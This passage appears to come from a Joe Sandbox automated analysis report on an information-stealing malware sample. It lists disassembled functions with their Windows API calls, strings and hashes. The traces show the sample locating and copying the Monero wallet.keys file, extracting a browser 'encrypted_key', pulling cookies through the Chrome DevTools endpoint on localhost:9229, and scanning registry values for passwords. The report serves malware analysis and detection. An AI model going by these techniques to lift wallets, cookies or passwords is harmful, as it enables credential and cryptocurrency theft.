                                    • lstrlen.KERNEL32(00000000), ref: 00BD9D26
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                    • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                    • API String ID: 3174675846-3542011879
                                    • Opcode ID: b4ab837c39e4682155e36e2e9cfb79d77461e399977e3472c02971ec3b2e1540
                                    • Instruction ID: 601d366e2cf475a7ceb5c75830fe8257469fa45e386f31bdd66783ce6c1ac2af
                                    • Opcode Fuzzy Hash: b4ab837c39e4682155e36e2e9cfb79d77461e399977e3472c02971ec3b2e1540
                                    • Instruction Fuzzy Hash: 7C5194B6910608ABCB14EBE4DC95FEEB7B8AF54301F404599F205A7190EF70AA4CCF61
                                    Function 00BE5510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                      • Part of subcall function 00BD62D0: InternetOpenA.WININET(00BF0DFF,00000001,00000000,00000000,00000000), ref: 00BD6331
                                      • Part of subcall function 00BD62D0: StrCmpCA.SHLWAPI(?,018BE6D8), ref: 00BD6353
                                      • Part of subcall function 00BD62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BD6385
                                      • Part of subcall function 00BD62D0: HttpOpenRequestA.WININET(00000000,GET,?,018BE208,00000000,00000000,00400100,00000000), ref: 00BD63D5
                                      • Part of subcall function 00BD62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BD640F
                                      • Part of subcall function 00BD62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BD6421
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BE5568
                                    • lstrlen.KERNEL32(00000000), ref: 00BE557F
                                      • Part of subcall function 00BE8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BE8FE2
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00BE55B4
                                    • lstrlen.KERNEL32(00000000), ref: 00BE55D3
                                    • lstrlen.KERNEL32(00000000), ref: 00BE55FE
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: 4863ecb69c261ca6955c044622300edaf79fcd004ed3b4b4db0ec2a342d65406
                                    • Instruction ID: b8c31674a70cec0ba20eb9591dae19cd93b5088e5652a7b83d125ad1fa21f8af
                                    • Opcode Fuzzy Hash: 4863ecb69c261ca6955c044622300edaf79fcd004ed3b4b4db0ec2a342d65406
                                    • Instruction Fuzzy Hash: AE51EB30910188AFCB14EF75CDA6BED77B9AF20344F5184A8E50A67591EF307B49CB62
                                    Function 00BE1520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: db8354e5ef85b151620646ee59e75474020756419368cd1e22def5161c845a97
                                    • Instruction ID: 35ca7cc5406f10bb9d2fd913a29591a887e339733f33595e850be770fb059420
                                    • Opcode Fuzzy Hash: db8354e5ef85b151620646ee59e75474020756419368cd1e22def5161c845a97
                                    • Instruction Fuzzy Hash: 66C18FB69001199BCB14EF61DC99FDE77B9AF58304F0049D8E409A7242EB71FA89CF91
                                    Function 00BE44D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BE8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BE8F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE453C
                                    • lstrcat.KERNEL32(?,018BE1A8), ref: 00BE455B
                                    • lstrcat.KERNEL32(?,?), ref: 00BE456F
                                    • lstrcat.KERNEL32(?,018BD330), ref: 00BE4583
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BE8F20: GetFileAttributesA.KERNEL32(00000000,?,00BD1B94,?,?,00BF577C,?,?,00BF0E22), ref: 00BE8F2F
                                      • Part of subcall function 00BDA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BDA489
                                      • Part of subcall function 00BDA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BDA13C
                                      • Part of subcall function 00BDA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BDA161
                                      • Part of subcall function 00BDA110: LocalAlloc.KERNEL32(00000040,?), ref: 00BDA181
                                      • Part of subcall function 00BDA110: ReadFile.KERNEL32(000000FF,?,00000000,00BD148F,00000000), ref: 00BDA1AA
                                      • Part of subcall function 00BDA110: LocalFree.KERNEL32(00BD148F), ref: 00BDA1E0
                                      • Part of subcall function 00BDA110: CloseHandle.KERNEL32(000000FF), ref: 00BDA1EA
                                      • Part of subcall function 00BE9550: GlobalAlloc.KERNEL32(00000000,00BE462D,00BE462D), ref: 00BE9563
                                    • StrStrA.SHLWAPI(?,018BDFE0), ref: 00BE4643
                                    • GlobalFree.KERNEL32(?), ref: 00BE4762
                                      • Part of subcall function 00BDA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BD4F3E,00000000,00000000), ref: 00BDA23F
                                      • Part of subcall function 00BDA210: LocalAlloc.KERNEL32(00000040,?,?,?,00BD4F3E,00000000,?), ref: 00BDA251
                                      • Part of subcall function 00BDA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BD4F3E,00000000,00000000), ref: 00BDA27A
                                      • Part of subcall function 00BDA210: LocalFree.KERNEL32(?,?,?,?,00BD4F3E,00000000,?), ref: 00BDA28F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE46F3
                                    • StrCmpCA.SHLWAPI(?,00BF08D2), ref: 00BE4710
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00BE4722
                                    • lstrcat.KERNEL32(00000000,?), ref: 00BE4735
                                    • lstrcat.KERNEL32(00000000,00BF0FA0), ref: 00BE4744
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-0
                                    • Opcode ID: a37db713678f3c1c107f4c30992816d9bedcff1659c405ceb4327c9c8d9eb5a5
                                    • Instruction ID: be4366a28d622ea935428560317f5e0e9d97fc107a1a00b39e5c5600777dd217
                                    • Opcode Fuzzy Hash: a37db713678f3c1c107f4c30992816d9bedcff1659c405ceb4327c9c8d9eb5a5
                                    • Instruction Fuzzy Hash: 327155B6910208ABDB14EBB1DD45FEE77BDAB89300F0045D8B605A7151EB35EB48CFA1
                                    Function 00BD1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BD12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BD12B4
                                      • Part of subcall function 00BD12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00BD12BB
                                      • Part of subcall function 00BD12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BD12D7
                                      • Part of subcall function 00BD12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BD12F5
                                      • Part of subcall function 00BD12A0: RegCloseKey.ADVAPI32(?), ref: 00BD12FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BD134F
                                    • lstrlen.KERNEL32(?), ref: 00BD135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 00BD1377
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BE8CF0: GetSystemTime.KERNEL32(00BF0E1B,018BA148,00BF05B6,?,?,00BD13F9,?,0000001A,00BF0E1B,00000000,?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BE8D16
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00BD1465
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                      • Part of subcall function 00BDA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BDA13C
                                      • Part of subcall function 00BDA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BDA161
                                      • Part of subcall function 00BDA110: LocalAlloc.KERNEL32(00000040,?), ref: 00BDA181
                                      • Part of subcall function 00BDA110: ReadFile.KERNEL32(000000FF,?,00000000,00BD148F,00000000), ref: 00BDA1AA
                                      • Part of subcall function 00BDA110: LocalFree.KERNEL32(00BD148F), ref: 00BDA1E0
                                      • Part of subcall function 00BDA110: CloseHandle.KERNEL32(000000FF), ref: 00BDA1EA
                                    • DeleteFileA.KERNEL32(00000000), ref: 00BD14EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: 83c90af36ec998775598b57e4d7a396184418cfeef64832f8938b465be0526fb
                                    • Instruction ID: 8ff66860b3cf60ba50207702ab92f596ca91161015101d985319be239257cff0
                                    • Opcode Fuzzy Hash: 83c90af36ec998775598b57e4d7a396184418cfeef64832f8938b465be0526fb
                                    • Instruction Fuzzy Hash: E35130B1D501589BCB15FB61DDA2FED73BC9F54300F4045E8B60A62192EF307B89CAA6
                                    Function 00BD9A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenA.WININET(00BF0AF6,00000001,00000000,00000000,00000000), ref: 00BD9A6A
                                    • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00BD9AAB
                                    • InternetCloseHandle.WININET(00000000), ref: 00BD9AC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$Open$CloseHandle
                                    • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                    • API String ID: 3289985339-2144369209
                                    • Opcode ID: 394dfed9440d265cd28867b9dee709673559f1db13a9843842b1ae40222b2526
                                    • Instruction ID: de379d6c72ca89217335e1a0d40331fabeecc66310228721602c5779008788cf
                                    • Opcode Fuzzy Hash: 394dfed9440d265cd28867b9dee709673559f1db13a9843842b1ae40222b2526
                                    • Instruction Fuzzy Hash: 7C41FA75A10258EBCB14EBA5CC95BEDB7F4EB48740F104196F549A7290DBB0AE84CB50
                                    Function 00BD7630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BD7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BD739A
                                      • Part of subcall function 00BD7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BD7411
                                      • Part of subcall function 00BD7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BD746D
                                      • Part of subcall function 00BD7330: GetProcessHeap.KERNEL32(00000000,?), ref: 00BD74B2
                                      • Part of subcall function 00BD7330: HeapFree.KERNEL32(00000000), ref: 00BD74B9
                                    • lstrcat.KERNEL32(00000000,00BF192C), ref: 00BD7666
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00BD76A8
                                    • lstrcat.KERNEL32(00000000, : ), ref: 00BD76BA
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00BD76EF
                                    • lstrcat.KERNEL32(00000000,00BF1934), ref: 00BD7700
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00BD7733
                                    • lstrcat.KERNEL32(00000000,00BF1938), ref: 00BD774D
                                    • task.LIBCPMTD ref: 00BD775B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                    • String ID: :
                                    • API String ID: 2677904052-3653984579
                                    • Opcode ID: bec6b7d2a11a3487a899e1badefffa77383ecbbc4ea35d569b41efc1f5fdd5fb
                                    • Instruction ID: 4b8ace5b4b6b8fa229debdccd90bff6cfb00b1d1c3ca027a6a8b3852c4d5d94d
                                    • Opcode Fuzzy Hash: bec6b7d2a11a3487a899e1badefffa77383ecbbc4ea35d569b41efc1f5fdd5fb
                                    • Instruction Fuzzy Hash: 94313EB1A08109DFDB04DBA5DC959FFB7B9AB49301B504599F102733A0EB74A94ECBA0
                                    Function 00BE8290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,018BDD40,00000000,?,00BF0E14,00000000,?,00000000), ref: 00BE82C0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE82C7
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00BE82E8
                                    • __aulldiv.LIBCMT ref: 00BE8302
                                    • __aulldiv.LIBCMT ref: 00BE8310
                                    • wsprintfA.USER32 ref: 00BE833C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
